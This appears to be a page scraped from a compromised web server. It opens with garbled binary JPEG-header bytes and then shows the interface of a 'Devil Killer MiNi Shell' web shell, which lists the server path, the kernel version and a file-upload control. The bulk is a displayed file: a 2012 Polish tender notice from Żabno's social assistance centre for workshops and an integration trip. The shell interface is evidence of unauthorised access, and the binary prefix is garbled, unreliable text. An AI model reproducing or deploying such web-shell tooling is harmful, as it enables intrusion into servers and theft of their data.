JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120403/104712-N-2012.html

<p class="kh_header"><b>Żabno: Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie treningów 
i warsztatów w celu przeciwdziałania wykluczeniu społecznemu osób i rodzin korzystających ze świadczeń pomocy społecznej poprzez zwiększenie ich aktywności na płaszczyźnie rodzinnej, zawodowej i społecznej w ramach projektu : Program Operacyjny Kapitał Ludzki, Priorytet VII. Promocja integracji społecznej. Działanie 7.1  Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej</b><br>
<b>Numer ogłoszenia: 104712 - 2012; data zamieszczenia: 03.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Świętego Jana 3a, 33-240 Żabno, woj. małopolskie, tel. 14 645 65 60, 645 64 33, faks 14 645 64 33.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie treningów 
i warsztatów w celu przeciwdziałania wykluczeniu społecznemu osób i rodzin korzystających ze świadczeń pomocy społecznej poprzez zwiększenie ich aktywności na płaszczyźnie rodzinnej, zawodowej i społecznej w ramach projektu : Program Operacyjny Kapitał Ludzki, Priorytet VII. Promocja integracji społecznej. Działanie 7.1  Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Program składa się z następujących elementów :
1.Treningi i warsztaty psychologiczne obejmujące w szczególności: zajęcia integracyjne, nawiązywanie i utrzymywanie kontaktów interpersonalnych, bariery komunikacji interpersonalnej, doskonalenie komunikacji werbalnej i pozawerbalnej, współpraca w realizacji zadań, trening asertywności i redukcji frustracji, zasoby, ograniczenia i granice - budowanie adekwatnej samooceny, autoprezentacja i wystąpienia publiczne, planowanie własnego rozwoju - cele życiowe i zawodowe - termin kwiecień- sierpień 2012r. 
Wymagania Zamawiającego :
-przeprowadzenie w roku 2012 treningów i warsztatów psychologicznych (w formie wyjazdowej i stacjonarnej) dla grupy 12 osób w wymiarze 68 godzin (1godz.);  
22 godziny podczas wyjazdu 3 dniowego w miesiącu czerwcu, w dniach piątek, sobota, niedziela, 
24 godziny w lokalu udostępnionym przez Zamawiającego (4 dni po 6 godzin) w miesiącu kwiecień(6 godzin), maj(6 godzin), (lipiec 12godzin).
22 godziny zgodnie z punktem 3 tj. Treningi i warsztaty psychologiczne na trzydniowym wyjeździe integracyjno - edukacyjnym z elementami pedagogiki przeżycia
-przeprowadzenie  trzydniowych treningów i warsztatów o charakterze integracyjnym dla otoczenia beneficjentów ( ok. 36 osób) na wyjeździe w miejscu i czasie ustalonym dla w/w  grupy 12 beneficjentów w ilości 22 godzin.
-Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia liczby uczestników  wyjazdu do 10 % podanej w SIWZ, oraz zmiany proporcji liczby dzieci i osób dorosłych do 2-ch dni przed planowanym wyjazdem,
-Wykonawca zapewni zakwaterowanie w miejscowości górskiej położonej w odległości od 90 do 150 km od Żabna w budynku spełniającym następujące wymagania: stołówka mieszcząca się w budynku zakwaterowania, na terenie ośrodka zaplecze sportowo rekreacyjne - plac zabaw dla dzieci, basen/spa
-Wykonawca uzgadnia z Zamawiającym harmonogram realizacji poszczególnych zadań w projekcie,
-prowadzenie dokumentacji przebiegu treningów i warsztatów  z odpowiednim oznakowaniem promocyjnym - logo POKL, obejmującej w szczególności: program szkolenia, dziennik zajęć wraz z listą obecności; po ich zakończeniu przekazanie oryginałów tych dokumentów wraz ze wzorem zaświadczenia potwierdzającego ukończenie treningów i warsztatów,
-zapewnienie materiałów i pomocy dydaktycznych niezbędnych do przyswojenia wiedzy,  w formie papierowej i na płycie CD wraz z listą osób potwierdzających ich otrzymanie,
-prowadzenie ankiet porównawczych, personalnych w zakresie samooceny Uczestnika Projektu przed rozpoczęciem szkoleń i po ich zakończeniu oraz ankiet anonimowych po każdym bloku zajęć,
-uzyskanie zgody na przetwarzanie danych od Uczestników Projektu oraz ich otoczenia i przetwarzanie ich zgodnie z przepisami prawa,
-Zamawiający wymaga zapewnienia sprzętu niezbędnego do prowadzenia zajęć, oraz aby każdy uczestnik otrzymał, co najmniej artykuły piśmiennicze, notatnik, teczkę na gumkę za potwierdzeniem odbioru,
-przekazanie Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych 
i dydaktycznych,
-zapewnienie nadzoru nad organizacją treningów i realizacją programu merytorycznego,
-ubezpieczenie uczestników treningu i ich otoczenia od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia,
-zapewnienie uczestnikom treningu i ich otoczeniu (należy przyjąć ok. 36 osób)  transportu z miejsca zbiórki do miejsca prowadzonego szkolenia tam i z powrotem (potwierdzenie korzystania z usługi),
-zapewnienie uczestnikom treningu i ich otoczeniu 2 noclegów, w tym odpowiednich warunków noclegowych w pokojach maksymalnie czteroosobowych z łazienkami (potwierdzenie korzystania z usługi),
-zapewnienie fachowej opieki nad dziećmi, które z różnych powodów mogą nie brać udzialu w zajęciach (np. wiek, stopień trudności zajęć), 
-zapewnienie odpowiednich sal szkoleniowych do prowadzenia zajęć, wyposażonych w odpowiednią liczbę miejsc i stolików,
-Wykonawca zobowiązuje się zapewnić catering dla uczestników i ich otoczenia  - I dzień - śniadanie, obiad (2 daniowy), kolacja, przerwy kawowe (kawa, herbata, soki, woda, ciastka, owoce), II dzień - śniadanie, obiad (2 daniowy), kolacja, przerwy kawowe (kawa, herbata, soki, woda, ciastka, owoce), III dzień śniadanie, obiad (2 daniowy), kolacja przerwy kawowe (kawa, herbata, soki, woda, ciastka, owoce) (potwierdzenie korzystania z cateringu).
-zapewnienie 1 gorącego posiłku na szkoleniach 6 godz. oraz napoi (kawa, herbata, soki, woda mineralna) potwierdzenie korzystania z posiłku.
-Wykonawca zobowiązuje się do prowadzenia monitoringu, ewaluacji działań w projekcie w formie raportu z efektywności działań oceniającego postępy uczestników w zdobywaniu przekazywanej wiedzy i umiejętności oraz przedstawienie wyników Zamawiającemu w raporcie końcowym.
-zapewnienie udziału w wyjeździe dla 3-5 osób w ramach nadzoru ze strony Zamawiającego 
-Wykonawca zobowiązuje się do prowadzenia w/w czerwcowych wyjazdowych treningów i warsztatów w terminie innym niż treningi i warsztaty opisane w punkcie 2 tj. Treningi i warsztaty psychologiczno-pedagogiczne

2.Treningi i warsztaty psychologiczno-pedagogiczne dla rodziców mających trudności w sprawach opiekuńczo - wychowawczych obejmować będą między innymi : normy i zasady współżycia w rodzinie i jej otoczeniu, zasady komunikacji interpersonalnej oraz bariery w komunikacji, umacnianie więzi i budowanie właściwych relacji w kontekście rodziny i jej otoczenia, trening redukcji frustracji, planowanie własnego rozwoju w kontekście zachowania właściwej funkcji w rodzinie - termin kwiecień- sierpień 2012r.  
Wymagania Zamawiającego :
przeprowadzenie w roku 2012 treningów i warsztatów psychologiczno-pedagogicznych (w formie wyjazdowej i stacjonarnej) dla grupy : 10 osób w wymiarze 68 godzin(1godz.);  
22 godziny podczas wyjazdu 3 dniowego, wyjazd w miesiącu czerwcu w dniach piatek, sobota, niedziela. 
24 godziny w miesiącach kwiecień (6 godzin), maj (6 godzin), lipiec 12 godzin)  
w lokalu udostępnionym przez Zamawiającego ( 4 dni po 6 godzin),
22 godziny zgodnie z punktem 3 tj. Treningi i warsztaty psychologiczne na trzydniowym wyjeździe integracyjno - edukacyjnym z elementami pedagogiki przeżycia
-przeprowadzenie  trzydniowych treningów i warsztatów o charakterze integracyjnym dla otoczenia beneficjentów (ok. 30 osób) na wyjeździe w miejscu 
i czasie ustalonym dla w/w grupy 10 beneficjentów w ilości 22 godzin.
-Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia liczby uczestników wyjazdu do 10 % podanej w SIWZ, oraz zmiany proporcji liczby dzieci i osób dorosłych do 2-ch dni przed planowanym wyjazdem,
-Wykonawca zapewni zakwaterowanie w miejscowości górskiej położonej w odległości od 90 do 150 km od Żabna w budynku spełniającym następujące wymagania: stołówka mieszcząca się w budynku zakwaterowania, na terenie ośrodka zaplecze sportowo rekreacyjne - plac zabaw dla dzieci, basen/spa
-Wykonawca uzgadnia z Zamawiającym harmonogram realizacji poszczególnych zadań w projekcie,
-prowadzenie dokumentacji przebiegu treningów i warsztatów, z odpowiednim oznakowaniem promocyjnym-logo POKL, obejmującej w szczególności: program szkolenia, dziennik zajęć wraz z listą obecności; po zakończeniu treningu przekazania oryginałów tych dokumentów wraz ze wzorem zaświadczenia potwierdzającego ukończenie treningów i warsztatów.
-zapewnienie materiałów i pomocy dydaktycznych niezbędnych do przyswojenia wiedzy, w formie papierowej i na płycie CD wraz z listą osób potwierdzających ich otrzymanie. 
-Zamawiający wymaga zapewnienia sprzętu niezbędnego do prowadzenia zajęć oraz aby każdy uczestnik otrzymał, co najmniej artykuły piśmiennicze, notatnik, teczkę na gumkę  za potwierdzeniem odbioru,
-przekazanie Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych
-prowadzenie ankiet porównawczych, personalnych w zakresie samooceny Uczestnika projektu  przed rozpoczęciem szkoleń  i po ich zakończeniu oraz ankiet anonimowych po każdym bloku zajęć,
-uzyskanie zgody na przetwarzanie danych od Uczestników Projektu oraz ich otoczenia 
i przetwarzanie ich zgodnie z przepisami prawa,
-zapewnienie nadzoru nad organizacją treningów i realizacją programu merytorycznego,
-ubezpieczenie uczestników treningu i ich otoczenia od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia, 
-zapewnienie uczestnikom treningu i ich otoczeniu (należy przyjąć ok. 30 osób)  transportu z miejsca zbiórki do miejsca prowadzonego szkolenia tam i z powrotem, (potwierdzenie korzystania z usługi),
-zapewnienie uczestnikom treningów i ich otoczeniu 2 noclegów, w tym odpowiednich warunków noclegowych w pokojach maksymalnie czteroosobowych z łazienkami, (potwierdzenie korzystania z usługi),
-zapewnienie fachowej opieki nad dziećmi, które z różnych powodów mogą nie brać udzialu w zajęciach (np. wiek, stopień trudności zajęć), 
-zapewnienie odpowiednich sal szkoleniowych do prowadzenia zajęć, wyposażonych w odpowiednią liczbę miejsc i stolików,
-Wykonawca zobowiązuje się zapewnić catering dla uczestników i ich otoczenia 
I dzień - śniadanie, obiad (2 daniowy), kolacja, przerwy kawowe (kawa, herbata, soki, woda, ciastka, owoce), II dzień - śniadanie, obiad (2 daniowy), kolacja, przerwy kawowe (kawa, herbata, soki, woda, ciastka, owoce), III dzień śniadanie, obiad (2 daniowy), kolacja przerwy kawowe (kawa, herbata, soki, woda, ciastka, owoce) (potwierdzenie korzystania z cateringu)
-Zapewnienie 1 gorącego posiłku na szkoleniach 6 godz. oraz napoi (kawa, herbata, soki, woda mineralna) - potwierdzenie korzystania z posiłku,
-Wykonawca zobowiązuje się do prowadzenia monitoringu, ewaluacji działań w projekcie w formie raportu z efektywności działań oceniającego postępy uczestników w zdobywaniu przekazywanej wiedzy i umiejętności oraz przedstawienie wyników Zamawiającemu w raporcie końcowym.
-zapewnienie udziału w wyjeździe dla 3-5 osób w ramach nadzoru ze strony Zamawiajacego
-Wykonawca zobowiązuje się do prowadzenia w/w czerwcowych wyjazdowych treningów i warsztatów w terminie innym niż treningi i warsztaty opisane w punkcie 1 tj. Treningi i warsztaty psychologiczne

3.Treningi i warsztaty psychologiczne na trzydniowym wyjeździe integracyjno - edukacyjnmy z elementami pedagogiki przeżycia dla  uczestników projektu i ich otoczenia w ramach Programu Operacyjnego Kapitał Ludzki - Termin realizacji - weekend (piątek, sobota, niedziela) w miesiącu sierpniu 2012r. 
Wymagania zamawiającego
-Zorganizowanie trzydniowego wyjazdu integracyjno - edukacyjny z elementami pedagogiki przeżycia dla  88 osób tj. 22 Beneficjentów i  66 osób otoczenia (w tym ok. 30 dorosłych 58 dzieci)	
-  Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia liczby uczestników wyjazdu do 10 % podanej w SIWZ, oraz zmiany proporcji liczby dzieci i osób dorosłych do   2-ch dni przed planowanym wyjazdem.
-  Wykonawca zapewni zakwaterowanie w miejscowości górskiej położonej w odległości od 150 do 200km od Żabna w budynku spełniającym następujące wymagania: stołówka mieszcząca się w budynku zakwaterowania, na terenie ośrodka zaplecze sportowo rekreacyjne - plac zabaw dla dzieci, basen/spa
-  Wyjazd integracyjno-edukacyjny winien obejmować następujący program: 
a) Program dzień I
7:00 Zbiórka na parkingu w miejscowości Żabno, i wyjazd z Żabna do ośrodka szkoleniowego 
Przyjazd do ośrodka: Zakwaterowanie, śniadanie
Wykonawca zobowiązuje się zapewnić catering dla wszystkich uczestników I dzień - śniadanie, obiad (2 daniowy), kolacja, przerwy kawowe (kawa, herbata, soki, woda, ciastka, owoce),
Zajęcia z pedagogiki przeżycia (1 godzina) - wprowadzenie - zajęcia dla całej grupy (gry, zabawy integracyjne i edukacyjne dla dzieci) w czasie zajęć barek kawowy, soki, ciastka, woda mineralna. Zajęcia realizowane przez psychologa/pedagoga.
Obiad
Zajęcia z pedagogiki przeżycia (5 godzin)  - pedagogika kultury - Wycieczka z licencjonowanym przewodnikiem tatrzańskim do: 
Muzeum Tatrzańskiego, Miejska Galeria Sztuki, Cmentarz na Pęksowym Brzysku, Zwiedzanie Mogiły Ofiar I Wojny Światowej, Sanktuarium Matki Bożej Fatimskiej na Krzeptówkach - poznanie historii najsłynniejszego kościoła w Zakopanem postawionego jako wotum dziękczynne przez górali za ocalenie życia papieżowi Janowi Pawłowi II.
W trakcie wycieczki realizowane będą zajęcia z pedagogiki kultury, przez psychologa/pedagogów przy udziale licencjonowanego przewodnika tatrzańskiego obejmujące w szczególności:
Budowa poczucia własnej wartości i obrona swoich praw
Poznawanie zasad powstawania zależności między ludźmi,
Rozwijanie umiejętności komunikacji w grupie,
Lepsze zrozumienie powstawania konfliktów grupowych,
Uświadomenie jak ważne sa zdrowe relacje między luźmi,
Budowanie umiejętności respektowania i szanowania innych 
Kolacja 
Czas wolny - nocleg
Łączna liczba godzin zajęć w pierwszym dniu - 6 
b)  Program dzień II 
Wykonawca zobowiązuje się zapewnić catering dla uczestników II dzień - śniadanie, obiad (2 daniowy), kolacja, przerwy kawowe (kawa, herbata, soki, woda, ciastka, owoce),
Śniadanie
Zajęcia z pedagogiki przeżycia (2 godziny) - pedagogika kultury - podsumowanie pierwszego dnia zajęć, w czasie zajęć barek kawowy, soki, ciastka, woda mineralna. Zajęcia  z psychologiem/pedagogiem.
Zajęcia z pedagogiki przeżycia (1 godzina)  - pedagogika środowiska - wprowadzenie. 
W czasie zajęć barek kawowy, soki, ciastka, woda mineralna. Zajęcia z 
psychologiem/pedagogiem.
Obiad 
Zajęcia z pedagogiki przeżycia ( 5 godzin) - pedagogika środowiska - Wycieczka z licencjonowanym przewodnikiem tatrzańskim na Gubałówkę (wyjazd kolejką), zjazd na zjeżdżalni grawitacyjnej na Gubałówce, przejście promenadą z widokiem na Tatry, zjazd kolejką liniową Butorowy Wierch, Spacer po Krupówkach, pustelnia Św. Brata Alberta. 
W trakcie wycieczki realizowane będą zajęcia z pedagogiki środowiska, przez psychologa/pedagogów przy udziale licencjonowanego przewodnika tatrzańskiego obejmujące w szczególności:
Poznawanie emocji oraz sposobów zdrowego radzenia sobie z nimi,
Poznawanie przyczyn mechanizmów, skutków i sposobów przeciwdziałania przemocy i agresji, lepsze zrozumienie własnego zachowania, 
poznanie własnych psychofizycznych granic i możliwości, 
uświadomienie sobie, jak przeżywam siebie i jak przeżywam innych.
lepsze zrozumienie wzajemnych zależności człowieka z otaczającą go naturą,
uwrażliwienie na piękno, niepowtarzalność a przede wszystkim na kruchość przyrody.
Kolacja w formie grilla z podsumowaniem drugiego dnia zajęć - cd. - zajęcia z pedagogiki przeżycia( 2 godzin)  - pedagogika środowiska - nocleg
Łączna liczba godzin zajęć w drugim dniu - 10
c)  Program dzień  III
Wykonawca zobowiązuje się zapewnić catering dla uczestników III dzień - śniadanie, II śniadanie, obiad (2 daniowy), przerwy kawowe (kawa, herbata, soki, woda, ciastka, owoce),
Śniadanie
Zajęcia z pedagogiki przeżycia (1 godzina)  - pedagogika przygody i zabawy  - wprowadzenie. W czasie zajęć drugie śniadanie, barek kawowy, soki, ciastka, woda mineralna. Zajęcia  z psychologiem/pedagogiem 
Zajęcia z pedagogiki przeżycia (5 godzin) - pedagogika przygody i zabawy  - udział grupy w zajęciach w Aqua Park w Zakopanym lub Park Linowy na Gubałówce.
W trakcie zajęć realizowane będą założenia pedagogiki przygody i zabawy, przez psychologa/pedagogów obejmujące w szczególności:
Poszerzenie zdolności konstruktywnego radzenia sobie z problemami, 
Nauka twórczego myślenia i działania w otoczeniu
Umiejętność pokonywania barier i własnych ograniczeń
Akceptacja samego siebie
Integracja grupy i współpraca budowanie zaufania
Doświadczanie granic możliwości, 
Budowanie wzajemnej odpowiedzialności
Zrozumienie potrzeb, myśli i uczuć drugiego człowieka
Obiad
wyjazd powrotny do Żabna
Łączna liczba godzin zajęć w trzecim dniu - 6
- Zamawiający dopuszcza w sytuacjach niezależnych od Wykonawcy po uzyskaniu zgody od  przedstawiciela Zamawiającego zorganizowanie alternatywnego programu zajęć w  plenerze o charakterze równoważnym do zaproponowanego.
- prowadzenie dokumentacji wyjazdu integracyjneco  z odpowiednim oznakowaniem  promocyjnym - logo POKL, obejmującej w szczególności: program szkolenia, dziennik zajęć wraz z listą obecności; po ich zakończeniu przekazanie oryginałów tych dokumentów wraz ze wzorem zaświadczenia potwierdzającego uczestnictwo,
-zapewnienie materiałów i pomocy dydaktycznych niezbędnych do przyswojenia wiedzy,  w formie papierowej i na płycie CD wraz z listą osób potwierdzających ich otrzymanie,
-Zamawiający wymaga zapewnienia sprzętu niezbędnego do prowadzenia zajęć, 
-uzyskanie zgody na przetwarzanie danych od Uczestników Projektu oraz ich otoczenia i przetwarzanie ich zgodnie z przepisami prawa,
-przekazanie Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych,
-zapewnienie nadzoru nad organizacją i realizacją programu wyjazdu,
-ubezpieczenie uczestników treningu i ich otoczenia od następstw nieszczęśliwych  ypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia,
-zapewnienie uczestnikom treningu transportu z miejsca zbiórki do miejsca prowadzonego szkolenia tam i z powrotem (potwierdzenie korzystania z usługi),
-zapewnienie uczestnikom treningu 2 noclegów, w tym odpowiednich warunków noclegowych w pokojach maksymalnie czteroosobowych z łazienkami (potwierdzenie korzystania z usługi),
-zapewnienie fachowej opieki nad dziećmi, które z różnych powodów mogą nie brać udzialu w zajęciach (np. wiek, stopień trudności zajęć), 
- zapewnienie odpowiednich sal szkoleniowych do prowadzenia zajęć, wyposażonych w odpowiednią liczbę miejsc i stolików,
- zapewnienie udziału w wyjeździe dla 3-5 osób w ramach nadzoru ze strony Zamawiajacego 

4.Warsztaty z mikro-wykładami obejmujace w szczególniości tendencje na rynku pracy, umiejętności uniwersalne, zawodowe i adaptacyjne, umiejętności analizowania ofert pracy, metody poszukiwania pracy (przygotowanie do rozmowy z pracodawcą - zasady rozmowy kwalifikacyjnej), nabywanie umiejętności tworzenia wizerunku własnej osoby  - autoprezentacja, bilans własnych umiejętności i doświadczeń, przygotowanie dokumentów aplikacyjnych, rozmowa kwalifikacyjna - ćwiczenie - kwiecień, maj 2012 r.
Wymagania Zamawiającego :
-Przeprowadzenie w 2012 roku warsztatów z mikro-wykładami w formie stacjonarnej dla grupy 12 osobowej w wymiarze 18 godzin (1godz.) w lokalu udostepnionym przez Zamawiajacego tj. 6 godzin w miesiącu kwietniu i 12 godzin w miesiącu maju,
-Wykonawca uzgadnia z Zamawiającym harmonogram realizacji poszczególnych zadań w projekcie,
-prowadzenie dokumentacji przebiegu warsztatów z mikro-wykładami, 
z odpowiednim oznakowaniem promocyjnym - logo POKL, obejmującej 
w szczególności: program szkolenia, dziennik zajęć wraz z listą obecności; po zakończeniu warsztatów  przekazanie Zamawiającemu oryginałów tych dokumentów wraz ze wzorem  zaświadczenia potwierdzającego ukończenie warsztatów z mikro-wykładami.
-zapewnienie materiałów szkoleniowych i pomocy dydaktycznych niezbędnych do przyswojenia wiedzy w formie papierowej i na płycie CD wraz z listą osób potwierdzających ich otrzymanie. 
- Zamawiający wymaga zapewnienia sprzętu niezbędnego do prowadzenia zajęć oraz,  aby każdy uczestnik otrzymał, co najmniej artykuły piśmiennicze, notatnik, teczkę na gumkę za potwierdzeniem odbioru,
-przekazanie Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych,
-prowadzenie ankiet porównawczych, personalnych z zakresu samooceny Uczestnika Projektu przed rozpoczęciem warsztatów i po ich zakończeniu, oraz ankiet anonimowych po każdym bloku zajęć,
-ubezpieczenie uczestników warsztatów z mikro-wykładami od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia,
-zapewnienie nadzoru nad organizacją treningów i realizacją programu merytorycznego,
-Wykonawca zobowiązuje się do prowadzenia monitoringu, ewaluacji działań w projekcie w formie raportu z efektywności działań oceniającego postępy uczestników w zdobywaniu przekazywanej wiedzy i umiejętności oraz przedstawienie wyników Zamawiającemu w raporcie końcowym.
-Zapewnienie cateringu w formie 1 gorącego posiłku na szkoleniach 6 godz. oraz napoi (kawa, herbata, soki, woda mineralna) - potwierdzenie korzystania z cateringu.
 
5. Poradnictwo i  wsparcie indywidualne.
Wymagania Zamawiającego : 
-dyżury specjalistów : (doradca zawodowy, psycholog, pedagog, prawnik zgodnie z oczekiwaniami UP) w roku 2012 (lipiec) -  88 godzin (1godz.)  dla 22 osób, w lokalu udostępnionym przez Zamawiającego, w ilośći conajmniej 3 godziny na UP. Pozostała  ilość wsparcia rozpisana będzie dla najbardziej potrzebujacych,
-Wykonawca uzgadnia z Zamawiającym harmonogram realizacji poszczególnych zadań w projekcie,
-prowadzenie dokumentacji doradczej z przebiegu porad, z odpowiednim oznakowaniem promocyjnym logo POKL, listy obecności. Po zakończeniu dyżurów przekazanie zamawiającemu orginałów tych dokumentów wraz ze wzorem zaświadczenia potwierdzającego korzystanie z poradnictwa i wsparcia indywidualnego,
-ubezpieczenie uczestników dyżurów specjalistów od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca dyżurów,

6.Zorganizowanie i finansowanie uczestnictwa w grupie wsparcia (samopomocowej).
Wymagania Zamawiającego :
-Zorganizowanie i przeprowadzenie grupy wsparcia dla 22 osób w łacznej liczbie 32 godzin(1godz.)  w miesiącach sierpień, wrzesień, październik i listopad 2012 r. W każdym miesiącu winno się odbyć 2 spotkania każde po 4 godziny. 
-Zorganizowanie w ramach grupy wsparcia specjalistycznych konsultacji i porad (np. pedagoga, psychologa, prawnika) w wymiarze miniumum 6 godzin dla jednego lub więcej specjalistów w zależności od potrzeb beneficjentek.
-Wykonawca uzgadnia z Zamawiającym harmonogram realizacji poszczególnych zadań w projekcie,
